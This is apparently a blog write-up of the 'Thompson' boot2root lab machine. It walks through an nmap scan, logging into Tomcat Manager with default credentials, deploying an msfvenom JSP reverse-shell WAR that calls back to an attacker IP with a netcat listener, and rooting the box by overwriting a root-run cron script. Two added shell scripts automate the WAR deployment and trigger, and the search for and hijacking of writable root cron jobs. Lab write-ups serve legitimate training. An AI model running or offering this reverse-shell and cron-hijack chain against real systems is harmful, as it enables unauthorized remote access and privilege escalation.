
Thompson

4 min read · Jun 14, 2021

Introduction

Hi Techies,

In this post we are going to walk through a boot2root machine, Thompson.

Let’s get started


Deploy

As always, the first step is to deploy the machine.

Connect with VPN & check connectivity


Reconnaissance

We will check for open ports on the vulnerable machine (a SYN scan and OS detection need root, hence the # prompt):

#nmap -sS -sV -O 10.10.142.92

Enumeration

We got three open ports.

Since port 8080/http is open, we will check the web server.

Browsing to port 8080 shows the default Tomcat landing page, which gives us the Tomcat version.

Looking through the page, there are three buttons: Server Status, Manager App and Host Manager. We will check them.

We will click on the Server Status button.

web-server

Once the button is clicked, a dialog box prompts for credentials.


As we do not know the credentials, click Cancel. Tomcat's 401 error page then shows an example tomcat-users.xml entry for the manager role, and on this box the example credentials are the real ones:

Username :- tomcat

Password :- s3cret

server-status

We will log in to the Tomcat Manager application with the credentials we found.

It directs us to the manager page.

The manager page lets us deploy a new application by uploading a WAR file.


A quick search turns up an msfvenom payload that packages a JSP reverse shell as a WAR file.


We will create the WAR file:

#msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.11.235 LPORT=1234 -f war > shell.war


Now that we have the WAR file, we will upload it through the manager's "WAR file to deploy" form.

1. user.txt

After deploying the WAR file, /shell is listed in the manager as a deployed application.

Open a listening port on the attacking machine:

#nc -lvnp 1234

Then open /shell in the browser; the JSP runs and the listener receives the reverse shell.
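The same deploy chain can be driven from a shell through the Tomcat Manager text API instead of the HTML form. The script below is an added example, not the write-up's own commands; it assumes the tomcat account also holds the manager-script role (the text API requires it; the HTML manager only needs manager-gui) and reuses the addresses from the write-up. By default it only prints each command (DRY_RUN=1); set DRY_RUN=0 to run them.

```shell
#!/bin/sh
# Added example (not from the write-up): the deploy chain driven from the
# shell with the Tomcat Manager text API instead of the HTML upload form.
# Assumptions: the account also holds the manager-script role (the text API
# requires it), and the addresses below are the ones used in the write-up.
TARGET="${TARGET:-http://10.10.142.92:8080}"
CREDS="${CREDS:-tomcat:s3cret}"
LHOST="${LHOST:-10.17.11.235}"
LPORT="${LPORT:-1234}"
APP="${APP:-/shell}"
WAR="${WAR:-shell.war}"
DRY_RUN="${DRY_RUN:-1}"   # 1 = print each command instead of running it

# Run a command, or just echo it when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Step 1: package a JSP reverse shell as a WAR (same payload as the write-up).
build_war() {
    run msfvenom -p java/jsp_shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f war -o "$WAR"
}

# Step 2: upload through the text API. -T sends the WAR as the PUT body; the
# server answers "OK - Deployed application at context path [/shell]" on success.
deploy_war() {
    run curl -s -u "$CREDS" -T "$WAR" "$TARGET/manager/text/deploy?path=$APP&update=true"
}

# Step 3: confirm the context is listed before triggering it.
list_apps() {
    run curl -s -u "$CREDS" "$TARGET/manager/text/list"
}

# Step 4: with nc -lvnp $LPORT waiting in another terminal, request the app
# root; the WAR's web.xml registers the generated JSP as the welcome file, so
# this request executes it and the shell connects back. The request stays open
# while the shell is alive, hence the timeout.
trigger_shell() {
    run curl -s -m 10 "$TARGET$APP/"
}

# Cleanup once done: remove the context so the backdoor does not stay deployed.
undeploy_war() {
    run curl -s -u "$CREDS" "$TARGET/manager/text/undeploy?path=$APP"
}

main() {
    build_war
    deploy_war
    list_apps
    echo "# start the listener first: nc -lvnp $LPORT"
    trigger_shell
}
main
```

A 403 from the text API means the account lacks manager-script, in which case the HTML upload form used above is the way in. Run undeploy_war when you are finished so the shell context is not left behind on the box.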


Navigate to /home.

Inside the home directory we find the user jack and the user flag.

In jack's home directory there are two more files, test.txt and id.sh. We will check their contents.

The contents of test.txt show that whatever wrote it ran as root.

2. root.txt

id.sh is executed by root, and its output is what ends up in test.txt. To confirm who runs it and when, we check /etc/crontab.


Since id.sh is executed by root from cron, and we can write to it, we overwrite it with a command that copies root.txt into jack's home directory:

#echo "cp /root/root.txt /home/jack/root.txt" > id.sh

On the next cron run, root copies the flag for us.
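The cron check can be done more generally than eyeballing the crontab. The script below is an added example, not from the write-up: it parses a system crontab, keeps entries that run as root, and flags any file in the command that the current user can write to, then writes the payload used above (with the /root/root.txt path and a chmod so the copy root creates is readable by us). The crontab and script at the bottom are constructed for the demo; on the box you would point it at /etc/crontab and /home/jack/id.sh.

```shell
#!/bin/sh
# Added example (not from the write-up): the privilege-escalation check done
# generally. find_writable_cron_scripts reads a system crontab (the /etc/crontab
# format with a user field and a 5-field schedule), keeps entries that run as
# root, and reports any file named in the command that the current user can
# write to. The crontab used in the demo at the bottom is constructed.

find_writable_cron_scripts() {
    crontab_file="$1"
    set -f    # "* * * * *" must not be glob-expanded when we split the line
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*|[A-Za-z_]*=*) continue ;;   # blank, comment, SHELL=/PATH= lines
        esac
        set -- $line
        [ $# -ge 7 ] || continue          # min hour dom mon dow user command...
        run_as="$6"
        shift 6
        [ "$run_as" = "root" ] || continue
        for tok in "$@"; do
            # any existing regular file we can write to is a hijack candidate
            if [ -f "$tok" ] && [ -w "$tok" ]; then
                printf '%s %s\n' "$run_as" "$tok"
            fi
        done
    done < "$crontab_file"
    set +f
}

# Overwrite the hijacked script with the write-up's payload (path
# /root/root.txt) plus a chmod so the copy, created by root, is readable by us.
hijack_cron_script() {
    target="$1"    # writable script root runs, e.g. /home/jack/id.sh
    dest="$2"      # where root should drop the copy, e.g. /home/jack/root.txt
    printf '#!/bin/sh\ncp /root/root.txt %s && chmod 644 %s\n' "$dest" "$dest" > "$target"
    printf 'payload written to %s; after the next cron run: cat %s\n' "$target" "$dest"
}

# Constructed demo: a fake crontab pointing at a world-writable script.
demo=$(mktemp -d)
: > "$demo/id.sh"
chmod 777 "$demo/id.sh"
printf 'SHELL=/bin/sh\n* * * * * root %s/id.sh\n30 2 * * * root %s/missing.sh\n' "$demo" "$demo" > "$demo/crontab"
find_writable_cron_scripts "$demo/crontab"      # reports only the writable id.sh
rm -rf "$demo"
```

The check reports the file and the user it runs as; anything it lists that lives in a directory you control is the hijack target, and the chmod in the payload is what saves you from getting a root-owned copy you still cannot read.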


We found the flags


Completed the box


I hope this blog was interesting and helps you learn the basics of working through a boot2root machine.

Happy learning!!!


Written by Pavithra Santhosh

This is Pavithra Santhosh, an aspiring cyber security professional, currently part of the Red Team certification programme at Hacker U.
